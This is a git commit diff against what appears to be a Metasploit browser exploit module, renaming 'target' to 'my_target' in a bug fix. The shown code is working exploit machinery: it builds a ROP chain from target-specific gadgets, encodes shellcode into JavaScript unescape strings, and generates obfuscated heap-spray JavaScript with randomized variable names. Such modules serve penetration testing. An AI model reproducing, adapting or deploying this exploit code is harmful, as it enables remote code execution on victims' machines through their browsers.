Fix broken target (variable naming)
This commit is contained in:
parent
2fccf4674f
commit
952ada1742
|
@ -184,7 +184,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
# Create the payload
|
# Create the payload
|
||||||
print_status("Creating payload for #{target.name}")
|
print_status("Creating payload for #{my_target.name}")
|
||||||
table =
|
table =
|
||||||
[
|
[
|
||||||
0x0c0c0c0c, # index
|
0x0c0c0c0c, # index
|
||||||
|
@ -194,15 +194,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
].pack("V*")
|
].pack("V*")
|
||||||
|
|
||||||
rop = rand_text_alpha_upper(56)
|
rop = rand_text_alpha_upper(56)
|
||||||
rop << [ target['PopEax'] ].pack("V")
|
rop << [ my_target['PopEax'] ].pack("V")
|
||||||
rop << rand_text_alpha_upper(40)
|
rop << rand_text_alpha_upper(40)
|
||||||
rop << get_rop_chain(target['FF'],target['OS'])
|
rop << get_rop_chain(my_target['FF'],my_target['OS'])
|
||||||
|
|
||||||
# Encode table, chain and payload
|
# Encode table, chain and payload
|
||||||
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(target.arch))
|
rop_js = Rex::Text.to_unescape(table+rop, Rex::Arch.endian(my_target.arch))
|
||||||
|
|
||||||
code = payload.encoded
|
code = payload.encoded
|
||||||
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(target.arch))
|
code_js = Rex::Text.to_unescape(code, Rex::Arch.endian(my_target.arch))
|
||||||
|
|
||||||
# random JavaScript variable names
|
# random JavaScript variable names
|
||||||
i_name = rand_text_alpha(rand(10) + 5)
|
i_name = rand_text_alpha(rand(10) + 5)
|
||||||
|
@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
var #{rop_name} = unescape("#{rop_js}");
|
var #{rop_name} = unescape("#{rop_js}");
|
||||||
var #{code_name} = unescape("#{code_js}");
|
var #{code_name} = unescape("#{code_js}");
|
||||||
var #{offset_length_name} = #{target['OffSet']};
|
var #{offset_length_name} = #{my_target['OffSet']};
|
||||||
|
|
||||||
for (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++)
|
for (var #{i_name}=0; #{i_name} < 0x300; #{i_name}++)
|
||||||
{
|
{
|
||||||
|
@ -261,9 +261,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
var #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name};
|
var #{single_sprayblock_name} = #{junk_offset_name} + #{rop_name} + #{code_name};
|
||||||
#{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length);
|
#{single_sprayblock_name} += #{padding_name}.substring(0,0x800 - #{offset_length_name} - #{rop_name}.length - #{code_name}.length);
|
||||||
|
|
||||||
while (#{single_sprayblock_name}.length < #{target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
|
while (#{single_sprayblock_name}.length < #{my_target['Size']}) #{single_sprayblock_name} += #{single_sprayblock_name};
|
||||||
|
|
||||||
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{target['Size']}-6)/2);
|
#{sprayblock_name} = #{single_sprayblock_name}.substring(0, (#{my_target['Size']}-6)/2);
|
||||||
|
|
||||||
#{varname_name} = "var" + #{randnum1_name}.toString() + #{randnum2_name}.toString();
|
#{varname_name} = "var" + #{randnum1_name}.toString() + #{randnum2_name}.toString();
|
||||||
#{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString();
|
#{varname_name} += #{randnum3_name}.toString() + #{randnum4_name}.toString() + #{i_name}.toString();
|
||||||
|
|
Loading…
Reference in New Issue